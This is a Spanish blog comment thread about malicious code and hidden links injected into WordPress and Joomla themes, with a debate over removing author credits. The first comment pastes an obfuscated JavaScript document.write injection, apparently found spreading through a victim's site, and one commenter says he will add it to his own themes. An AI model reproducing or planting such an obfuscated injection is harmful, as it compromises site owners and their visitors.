Comentarios en: Código malicioso para themes para Wordpress y Joomla

Por: jhan

jhan — Sat, 20 Dec 2008 17:58:56 +0000

tengo un problema, siempre se me instala este codigo en el wordpress y si va por todo el host incluyendo los archivos html de mi pagina normal, el codigo es este:

?>1)b+=s.charAt(i);return b;}document.write(a0(‘74u\x64n\151k\x76n40o\x73w\164n\x79 \154o\x65b75f\x22u\166s\x69c\163a\x69t\142i\x69o\154n\x69u\164n\x79k72n\x68o\151w\x64n\144 \x65o\156b\x22f76u\x3cs\151c\x66a\162t\x61i\155o\x65n40u\x73n\162k\x63n75o\x22w\150n\x74 \164o\x70b72f\x2fu57s\x39c61a\x2et62i\x31o61n\x2eu66n\x34k56n\x31o70w\x30n57 \x63o\147b\x69f55u\x62s\151c\x6ea57t\x69i\156o\x64n\145u\x78n56k\x63n\147o\x69w77n\x75 \163o\x65b\162f\x31u42s\x20c\166a\x69t\163i\x69o\142n\x69u\154n\x69k\164n\x79o72w\x68n\151 \x64o\144b\x65f\156u\x20s\167c\x69a\144t\x74i\150o\x3dn61u\x30n60k\x20n\150o\x65w\151n\x67 \150o\x74b75f\x38u60s\x3ec74a\x2ft\151i\x66o\162n\x61u\155n\x65k76n\x3co57w\x64n\151 \x76o76b’));’; ?>

El codigo se instala en todos los archivos, pensé primero que era por los templates, entonces borre todo e instalé nuevamente sin subir carpetas ajenas a las qe vienen originales a wordpress.org y para mi sorpresa hoy me sucedio lo mismo.
Tienen alguna idea de lo que pasa?
Saludos

Por: diabolik

diabolik — Wed, 30 Jan 2008 20:46:39 +0000

mm una buena idea lo voy a colocar ese codigo en mis themes

Por: Vuelven los problemas con los themes de Wordpress | aNieto2K

Vuelven los problemas con los themes de Wordpress | aNieto2K — Tue, 27 Nov 2007 08:18:27 +0000

[...] unos meses hablabamos del código malicioso que TemplatesBrowser.com injectaba en los themes que ponía a disposición de la gente. Con él, conseguian injectar enlaces en los themes [...]

Por: aNieto2k

aNieto2k — Fri, 03 Aug 2007 21:14:46 +0000

Yo soy partidario de SIEMPRE hacer referencia al autor, aunque sea sólo el nombre, sin enlace. Como desarrollador no me gustaría que la gente se aprovechará de mi trabajo eliminandolo de los créditos, siempre se puede mantener o hacer una mención. Así otros usuarios a los que les gustara el theme podrán encontrar de donde sacarlo.

Por: esaiz

esaiz — Fri, 03 Aug 2007 19:18:58 +0000

Casualmente es el theme que uso en mi blog, aunque ya lo tenía descargado desde el año pasado del sitio de themes de WP.

Sobre lo de quitar los créditos me parece bastante discutible, por ejemplo, el autor de este theme ya no existe en Internet, al menos la web que referencia cuando lo instalas ¿por qué mantener un enlace a una web que no existe? Hice referencia a él en la entrada del cambio de theme y punto.

Y en el caso de que se manipule el código debería avisarse, para que el usuario final lo supiera.

Por: Angelfire

Angelfire — Fri, 03 Aug 2007 18:32:00 +0000

Pues el theme podria descargarse de alli, eliminar la funcion, y simplemente poner un enlace al sitio.

Por: Alex

Alex — Fri, 03 Aug 2007 17:53:51 +0000

Digo yo que lo eliminamos y listo

Por: aNieto2k

aNieto2k — Fri, 03 Aug 2007 14:53:50 +0000

Lucas, el problema es que esos themes no son de TemplateWorld, sinó que son libres o Creative Commons a los que se le añade ese enlace simplemente por está en una galería de themes…. hasta ahi… vale… pero que encima se enlacen a sitios web de forma oculta… y sin que el usuario sea consciente de ello es una estrategia muy fea.

Por: Lucas

Lucas — Fri, 03 Aug 2007 13:56:20 +0000

Bueno si es cierto que enlaces de ese tipo no esta bien pero quizas sea una forma de ganar dinero para el dando publicidad no?

o igual me equivoco… :S

Por: Stahn

Stahn — Fri, 03 Aug 2007 12:44:32 +0000

¿Dilema de que? Si insertan codigo malicioso que se jodan.